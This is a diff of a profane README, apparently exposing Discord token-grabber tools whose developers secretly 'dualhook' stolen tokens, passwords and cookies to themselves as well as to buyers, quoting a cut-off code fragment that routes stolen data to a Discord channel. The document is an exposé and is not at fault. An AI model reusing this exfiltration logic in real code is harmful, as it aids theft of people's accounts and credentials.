ExtraFrisky/Byebye-Bby/README.md

 * Discord Certified Moderator
 * Verified Bot Developer

-**The admins get these tokens too.
-DUALHOOKED motherfucker!**
+**The admins get these tokens.
+DUALHOOKED motherfucker!**.
+You don't!
 The developers have been stealing your precious ultra rare accounts!
+Aww how sad this is.

 # Exhibit #4:
-All the passwords and cookies are dualhooked...
-All. of. them.
+All the passwords and cookies are dualhooked... **All. of. them.**
 ```
 // Send to the skidz
 client.channels.cache.get(clients[req.params.name])